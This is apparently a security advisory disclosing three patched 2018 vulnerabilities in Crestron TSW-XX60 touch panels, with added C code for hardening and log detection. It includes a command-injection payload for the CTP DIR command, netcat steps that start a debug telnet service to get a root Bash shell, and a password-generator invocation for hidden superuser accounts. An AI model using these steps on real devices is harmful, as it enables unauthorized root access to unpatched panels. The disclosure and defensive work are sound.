
Security Advisory: Crestron TSW-XX60 Touch Panel Devices Remote Code Execution Vulnerabilities

Written By: Steven Patterson

Crestron produces touchscreen devices, such as the TSW-XX60 series, which can be used to schedule meeting rooms in corporate offices. After the release of a recent device firmware update (which addressed several reported vulnerabilities), Security Compass is publishing the following security advisory.

Two remote code execution vulnerabilities and one elevation of privilege vulnerability were discovered and reported to Crestron by Security Compass’ Advisory team. The related technical details are now being disclosed, following Crestron’s latest patch that successfully remediated all reported issues.

The above vulnerabilities were reported to Crestron by Security Compass (Jackson Thuraisamy) in March 2018, and an active dialogue toward remediation continued until the release of patches in May 2018.

Unauthenticated Remote Code Execution via Command Injection in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018-11229

Vulnerability Details

A command-injection vulnerability existed in the Crestron TSW-XX60 touch panels that could be exploited through the CTP administrative interface listening on port 41795. This Telnet-like text console is used by the Crestron Toolbox software to manage the devices, and it does not list any command that gives direct access to the underlying Android OS. The CTP DIR command, however, was vulnerable to command injection through a crafted argument containing shell metacharacters. Output from the injected commands could be redirected into a text file on the device and then read back by an adversary.

Technical Description

The syntax of the DIR command allows a path to be specified:

DIR User/schedulingpanel

In the back end, the command being executed in the Android system follows:

ls -le "/mnt/sdcard/ROMDISK/User/schedulingpanel"

An adversary could modify the query to execute a command, such as the following:

ls -le "/mnt/sdcard/ROMDISK/User"; whoami > "/mnt/sdcard/ROMDISK/output.txt"

The built-in TYPE command could then be used to read the standard output of the whoami command:

TYPE output.txt

The base /mnt/sdcard/ROMDISK path could be discovered using built-in CTP commands.
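The following C is an added illustration (not Crestron's code, which this advisory does not reproduce) of the pattern described above: a builder that pastes the DIR argument into a shell command line, beside a hardened version that validates the relative path and hands it to ls as its own argv element so that no shell ever parses it. The ROMDISK base path comes from the advisory; the function names are assumed.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define ROMDISK "/mnt/sdcard/ROMDISK"

/* Vulnerable pattern (reconstructed for illustration): the DIR argument is pasted
 * into a shell line, so '"' then ';' closes the quoted path and starts a new command. */
int build_dir_shell_cmd(char *out, size_t outlen, const char *userpath) {
    return snprintf(out, outlen, "ls -le \"" ROMDISK "/%s\"", userpath);
}

/* Hardened, step 1: accept only a relative path of plain segments. Rejects quotes,
 * spaces and shell metacharacters, empty segments, "." and "..". */
bool dir_path_is_safe(const char *p) {
    if (p == NULL || *p == '\0' || strlen(p) > 255) return false;
    const char *seg = p;
    for (const char *c = p;; c++) {
        if (*c == '/' || *c == '\0') {
            size_t n = (size_t)(c - seg);
            if (n == 0 || (n == 1 && seg[0] == '.') ||
                (n == 2 && seg[0] == '.' && seg[1] == '.'))
                return false;
            if (*c == '\0') break;
            seg = c + 1;
        } else if (!isalnum((unsigned char)*c) && *c != '_' && *c != '-' && *c != '.') {
            return false;
        }
    }
    return true;
}

/* Hardened, step 2: build an argv for execv()/posix_spawn() so that no shell
 * ever parses the path. Returns 0 on success, -1 if the path was rejected. */
int build_dir_argv(char *argv[4], char *pathbuf, size_t pathlen, const char *userpath) {
    if (!dir_path_is_safe(userpath)) return -1;
    snprintf(pathbuf, pathlen, ROMDISK "/%s", userpath);
    argv[0] = "ls"; argv[1] = "-le"; argv[2] = pathbuf; argv[3] = NULL;
    return 0;
}

int main(void) {
    char cmd[512], path[512], *argv[4];
    const char *inject = "User\"; whoami > \"" ROMDISK "/output.txt";
    build_dir_shell_cmd(cmd, sizeof cmd, inject);
    printf("shell string: %s\n", cmd);   /* two commands on one line */
    printf("hardened: %d\n", build_dir_argv(argv, path, sizeof path, inject));  /* -1 */
    return 0;
}
```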

Unauthenticated Remote Code Execution via Bash Shell Service in Crestron Terminal Protocol (CTP)

Identifier: CVE-2018-11228

Vulnerability Details

The Crestron TSW-XX60 panels have an administrative interface open on port 41795 (Crestron Terminal Protocol). This Telnet-like text console is used by the Crestron Toolbox software to manage the touch panel devices. This interface does not list commands that could be used to directly access the underlying Android OS.

Two conditions existed on the touch panel device that allowed an adversary to gain remote code execution:

  1. A system service, called telnetd_debug, was capable of binding a Bash shell to port 23 (this service is disabled by default).
  2. An undocumented administrative command (RESTARTSERVICE) could be used to start services.

These conditions could be chained by disabling the running telnetd service with the TELNETPORT OFF command and then starting the telnetd_debug service with the RESTARTSERVICE command. Once both steps were performed, an interactive shell could be obtained and arbitrary system commands run on the device. If the user lacked the administrative privilege required for a terminal command, they could use the built-in SUDO command to elevate to root privileges (see CVE-2018-13341 below).

Technical Description

The Crestron Terminal Protocol (CTP) console can be reached by connecting to port 41795 on the TSW-XX60 device, which presents a command line interface.

[email protected]:~$ nc -C 41795
TSW-760 Control Console
Telnet Port: On

The user could then disable the running Telnet service and start the telnetd_debug service.

Telnet Port: Off
TSW-760> RESTARTSERVICE telnetd_debug
Service telnetd_debug restarted

The telnetd_debug service could then be connected to by accessing port 23. In response, the user received an interactive Bash shell with which commands could be run on the target device as the current running user (i.e. root).

[email protected]:~$ nc -C 23
bash-3.2# whoami
bash-3.2# pwd
bash-3.2# uname -a
Linux TSW760 3.10.33 #3 SMP PREEMPT Mon Nov 6 16:52:32 EST 2017 armv7l GNU/Linux
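As an added detection example (not part of the advisory or of Crestron's tooling), the C below scans CTP command records for the sequence just described, TELNETPORT OFF followed by RESTARTSERVICE telnetd_debug from the same source. The line layout and the sample entries are constructed for this example, since the advisory does not give the real audit-log format.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* debug_restarts: every RESTARTSERVICE telnetd_debug seen; chained: those sent
 * by a source that had already issued TELNETPORT OFF earlier in the log. */
struct debug_shell_findings { int debug_restarts; int chained; };

/* Constructed line layout assumed for this example (the advisory does not give
 * the real audit-log format): "<date> <time> <source-ip> <CTP command ...>". */
static bool parse_line(const char *line, char src[32], const char **cmd) {
    char date[16], clock[16]; int used = 0;
    if (sscanf(line, "%15s %15s %31s %n", date, clock, src, &used) != 3 || used == 0)
        return false;
    *cmd = line + used;
    return **cmd != '\0';
}
/* Case-insensitive whole-command match, tolerating a trailing CR/LF. */
static bool cmd_is(const char *cmd, const char *want) {
    for (; *want; cmd++, want++)
        if (toupper((unsigned char)*cmd) != toupper((unsigned char)*want)) return false;
    return *cmd == '\0' || *cmd == '\r' || *cmd == '\n';
}

/* Flags the TELNETPORT OFF -> RESTARTSERVICE telnetd_debug sequence per source. */
struct debug_shell_findings scan_ctp_log(const char *const *lines, size_t n) {
    struct debug_shell_findings f = {0, 0};
    char off_src[32][32]; size_t off_n = 0;   /* sources that turned Telnet off */
    for (size_t i = 0; i < n; i++) {
        char src[32]; const char *cmd; bool seen_off = false;
        if (!parse_line(lines[i], src, &cmd)) continue;
        for (size_t k = 0; k < off_n; k++)
            if (strcmp(off_src[k], src) == 0) seen_off = true;
        if (cmd_is(cmd, "TELNETPORT OFF")) {
            if (!seen_off && off_n < 32) strcpy(off_src[off_n++], src);
        } else if (cmd_is(cmd, "RESTARTSERVICE telnetd_debug")) {
            f.debug_restarts++;
            if (seen_off) f.chained++;
        }
    }
    return f;
}

/* Constructed sample: a full chain from .10 and a lone restart from .44. */
const char *const SAMPLE_LOG[] = {
    "2018-03-09 10:00:07 192.0.2.10 TELNETPORT OFF",
    "2018-03-09 10:00:09 192.0.2.10 RESTARTSERVICE telnetd_debug",
    "2018-03-09 10:02:30 192.0.2.44 RESTARTSERVICE telnetd_debug",
};
```

A lone RESTARTSERVICE telnetd_debug is still worth an alert; the chained count only separates the full sequence from the advisory.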

Elevation of Privilege in Crestron Terminal Protocol

Identifier: CVE-2018-13341

Vulnerability Details

Crestron TSW-XX60 touch panel devices were affected by a privilege-escalation vulnerability that could be exploited through access to administrative credentials in the device firmware. If an adversary gained access to system binaries (e.g. by obtaining the firmware), they could leverage the “supwdgenerator” binary to generate administrative passwords for the built-in SUDO command.

This command allowed lower-privileged users to provide credentials that enabled them to run Crestron Terminal Protocol (CTP) commands as an administrator after authentication. After inspecting the device firmware and generating the correct passwords, an adversary could execute commands on the device as an administrator.

Technical Description

The HELP documentation in CTP provided information about commands and the privilege required to execute them. As shown below, the supported user roles are Administrator, Programmer, and Operator.

GETANALOGJOIN   Programmer    Get a analog join value
GETAUDITLOG     Administrator Retrieve the audit log.
GETDIGITALJOIN  Programmer    Get a digital join value
GETPAsswordrule Administrator Display password rules
GETSERIALJOIN   Programmer    Get a serial join value
PING            Operator      Ping remote node
POEPLUS         Programmer    Enable/disable 24V
PRINTAUDITLOG   Administrator Print the audit log.
PROJECTREFresh  Administrator Sets time to Refresh project.
PROJECTRESTART  Programmer    Restart the user project.

One of the commands (SUDO) allowed a lower-privileged user to run commands as an Administrator. This was done by authenticating with a username and password.

SUDO cmd [param1 param2 ...]
cmd: command to execute.
param1,param2,…: parameters for the command.
Username: idontknow
Password: *********
Invalid user name or password..

Firmware analysis indicated that two additional usernames (crengsuperuser and crsuperuser) were supported, and their passwords were derived from the MAC address of the Ethernet adapter.

An adversary with access to the supwdgenerator application could run it with the command line used by the ctpd application. An example follows:

[email protected]:~$ ./supwdgenerator AA.BB.CC.DD.EE.FF -ForEngineerOnly wDyB[redacted]A8

The adversary could then use the password to authenticate with the SUDO command, as shown below:

Username: crengsuperuser
Password: ****************
Directory of 
[DIR] 02-07-18 11:27:41 ROMDISK
[DIR] 09-29-17 18:07:06 SSHBanner
[DIR] 02-07-18 11:21:16 SYS

Disclosure Process

  • Following Security Compass’ responsible disclosure process, Crestron PSIRT was notified of the vulnerabilities on March 9, 2018.
  • A response was promptly received from Crestron that they were investigating the matter with their engineering team.
  • Crestron acknowledged that the vulnerabilities were true positives and that they were investigating remediation.
  • A general release patch was available on May 30, 2018.

To learn more about Security Compass’ Verification Services, read about them here: https://www.securitycompass.com/advisory/services/verification/.

Advisory Labs

Steven Patterson
Security Consultant
Steven Patterson began his career as a game designer. After working on a cybersecurity-themed game, the experience got him interested in the subject matter. He spent a year learning and doing independent research, including publishing articles about Windows exploit development and fuzzing on his website shogunlab.com, before coming to work as a consultant with Security Compass.
